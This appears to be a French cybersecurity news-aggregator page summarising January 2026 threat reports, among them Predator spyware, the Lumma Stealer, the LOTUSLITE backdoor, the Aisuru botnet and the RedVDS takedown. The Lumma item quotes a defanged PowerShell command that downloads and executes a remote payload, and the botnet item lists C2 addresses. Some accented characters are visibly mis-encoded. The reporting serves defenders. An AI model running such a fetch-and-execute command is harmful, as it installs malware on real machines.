Jamf révÚle des techniques anti-analyse inédites dans le spyware iOS Predator

Source: Jamf Threat Labs (blog Jamf). Contexte: publication du 14 janvier 2026 prĂ©sentant des dĂ©couvertes originales issues de l’ingĂ©nierie inverse d’un Ă©chantillon de Predator, en complĂ©ment des travaux de Google Threat Intelligence Group (GTIG) de 2024. Jamf expose une architecture de surveillance anti-analyse centrĂ©e sur la classe C++ CSWatcherSpawner::CSWatcherSpawner et sa fonction check_perform(), avec un systĂšme de codes d’erreur (301–311) qui envoie au C2 un diagnostic prĂ©cis avant auto-nettoyage. Plusieurs codes sont mis en Ă©vidence (p. ex. 311 pour multi‑instances, 309 pour restriction gĂ©ographique, 310 pour console active, 304 pour outils de sĂ©curitĂ©), tandis que 302, 303, 305, 306 sont absents dans cet Ă©chantillon. ...

16 janvier 2026 Â· 3 min

Keylogger sur la boutique d’employĂ©s d’une des 3 plus grandes banques US (200 000+ exposĂ©s)

Source : Sansec Forensics Team (Threat Research), avis publiĂ© le 15 janvier 2026. Sansec rapporte avoir dĂ©tectĂ© un keylogger sur la boutique de produits dĂ©rivĂ©s destinĂ©e aux employĂ©s d’une des trois plus grandes banques amĂ©ricaines, active environ 18 heures avant retrait. L’attaque consiste en un keylogger/skimmer JavaScript cĂŽtĂ© client sur une boutique e‑commerce interne utilisĂ©e par 200 000+ employĂ©s. Le malware intercepte toutes les donnĂ©es de formulaire (identifiants, informations personnelles, numĂ©ros de cartes). Sansec souligne un Ă©cart de dĂ©tection: au moment de la publication, 1/97 moteurs sur VirusTotal dĂ©tectaient l’infrastructure malveillante. ...

16 janvier 2026 Â· 2 min

La NSA publie les premiers guides d’adoption Zero Trust (Primer et Discovery Phase)

Selon Help Net Security (15 janvier 2026), la National Security Agency (NSA) publie les deux premiers documents de sa sĂ©rie Zero Trust Implementation Guidelines (ZIG), posant les bases d’une adoption par Ă©tapes alignĂ©e sur le Department of War CIO Zero Trust Framework. La sĂ©rie ZIG est pensĂ©e pour une adoption par phases et de maniĂšre modulaire. Chaque phase propose un ensemble dĂ©fini d’étapes techniques et opĂ©rationnelles. Les organisations peuvent sĂ©lectionner les capacitĂ©s adaptĂ©es Ă  leur maturitĂ© et Ă  leurs prioritĂ©s, permettant une application incrĂ©mentale sans attendre un dĂ©ploiement global unique đŸ§©. ...

16 janvier 2026 Â· 2 min

LOTUSLITE : campagne d’espionnage ciblĂ©e via sideloading DLL, attribuĂ©e avec confiance modĂ©rĂ©e Ă  Mustang Panda

Source : Acronis Threat Research Unit (TRU). Dans un billet technique du 15 janvier 2026, Acronis TRU documente une campagne ciblĂ©e livrant un nouveau backdoor DLL, LOTUSLITE, via une archive ZIP Ă  thĂšme gĂ©opolitique liĂ©e aux relations États-Unis–Venezuela, contre des entitĂ©s gouvernementales/politiques amĂ©ricaines. Vue d’ensemble. La chaĂźne d’infection repose sur un exĂ©cutable lĂ©gitime et une DLL malveillante cachĂ©e, avec DLL sideloading pour exĂ©cuter un implant C++. LOTUSLITE communique avec un C2 Ă  IP codĂ©e en dur, offre des fonctions de tĂ©lĂ©commande (shell interactif, opĂ©rations fichiers, exfiltration basique) et met en place une persistance robuste. La campagne est jugĂ©e axĂ©e espionnage (et non financiĂšre), Ă  portĂ©e limitĂ©e mais Ă  impact potentiel Ă©levĂ© sur des cibles stratĂ©giques. ...

16 janvier 2026 Â· 4 min

Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Mandiant publie des tables arc-en-ciel Net‑NTLMv1 pour accĂ©lĂ©rer l’abandon du protocole

Source: Mandiant (Threat Intelligence, 15 janvier 2026). Contexte: l’éditeur publie un vaste jeu de tables arc‑en‑ciel pour Net‑NTLMv1, visant Ă  illustrer le risque immĂ©diat de ce protocole obsolĂšte et Ă  favoriser sa dĂ©prĂ©ciation effective. Mandiant annonce la mise Ă  disposition publique d’un dataset complet de tables arc‑en‑ciel Net‑NTLMv1, soulignant que ce protocole est insecure depuis plus de deux dĂ©cennies. L’objectif est de faciliter pour les dĂ©fenseurs la dĂ©monstration concrĂšte de la faiblesse de Net‑NTLMv1 (sans ESS) via une attaque par texte clair connu sur le texte « 1122334455667788 », garantissant la rĂ©cupĂ©ration du matĂ©riel de clĂ© (liĂ© au hash de mot de passe AD) et potentiellement une escalade de privilĂšges. ...

16 janvier 2026 Â· 2 min

Microsoft dĂ©mantĂšle RedVDS, un service de bureaux virtuels au cƓur de campagnes cybercriminelles

Source : BleepingComputer — Microsoft a annoncĂ© avoir perturbĂ© RedVDS, une plateforme cybercriminelle de « virtual desktop » (VDS) opĂ©rant depuis 2019, via des actions civiles aux États‑Unis et au Royaume‑Uni et une opĂ©ration internationale conduite avec Europol et les autoritĂ©s allemandes. RedVDS fonctionnait comme un Cybercrime-as-a-Service vendant des serveurs Windows en cloud avec droits administrateur et sans limites d’usage pour environ 24 $/mois. La plateforme a Ă©tĂ© utilisĂ©e par plusieurs groupes de menace, dont Storm‑0259, Storm‑2227, Storm‑1575 et Storm‑1747, et son dĂ©veloppeur/opĂ©rateur est suivi comme Storm‑2470. Microsoft a saisi l’infrastructure, mettant hors ligne le marketplace et le portail client. Deux co‑demandeurs se sont joints Ă  l’action : H2‑Pharma (perte de 7,3 M$ via BEC) et l’association Gatehouse Dock Condominium en Floride (prĂšs de 500 000 $). ...

16 janvier 2026 Â· 3 min

Microsoft et les forces de l’ordre dĂ©mantĂšlent RedVDS, service de cybercriminalitĂ© Ă  l’abonnement

Source: Microsoft (Digital Crimes Unit) — Microsoft annonce une action juridique coordonnĂ©e aux États-Unis et, pour la premiĂšre fois, au Royaume‑Uni, appuyĂ©e par des autoritĂ©s allemandes et Europol, pour perturber RedVDS, un service d’abonnement fournissant des ordinateurs virtuels jetables utilisĂ©s dans des fraudes massives. L’opĂ©ration a permis la saisie d’infrastructures clĂ©s et la mise hors ligne de la place de marchĂ© RedVDS. RedVDS s’inscrit dans l’écosystĂšme cybercrime-as-a-service en offrant, dĂšs 24 USD par mois, des machines virtuelles discrĂštes et Ă©phĂ©mĂšres fonctionnant avec des logiciels non licenciĂ©s, dont Windows. Ce service a Ă©tĂ© massivement exploitĂ© pour envoyer des campagnes de phishing Ă  haut volume, hĂ©berger de l’infrastructure de scam, et faciliter des fraudes assistĂ©es par IA gĂ©nĂ©rative (face swap, manipulation vidĂ©o, clonage de voix). En un mois, plus de 2 600 VM RedVDS ont expĂ©diĂ© en moyenne 1 million d’e‑mails de phishing par jour vers des clients Microsoft (sur les 600 millions d’attaques bloquĂ©es quotidiennement), contribuant depuis septembre 2025 Ă  plus de 191 000 compromissions ou accĂšs frauduleux d’organisations. ...

16 janvier 2026 Â· 3 min

Moxie Marlinspike lance Confer, un assistant IA chiffré de bout en bout via TEE

Selon l’extrait d’actualitĂ© du 16 janvier 2026, Moxie Marlinspike (crĂ©ateur de Signal) lance Confer, un assistant IA privĂ© et open source misant sur le chiffrement de bout en bout et un environnement d’exĂ©cution de confiance (TEE) pour protĂ©ger les conversations. Le contexte Ă©voque les risques de stockage centralisĂ© des chatbots grand public et rappelle une ordonnance de juin 2025 imposant Ă  OpenAI de conserver indĂ©finiment les conversations de ChatGPT, alimentant la dĂ©fiance. Le billet de blog de Confer et des Ă©changes avec Ars Technica sont citĂ©s. ...

16 janvier 2026 Â· 2 min
Derniùre mise à jour le: 9 Feb 2026 📝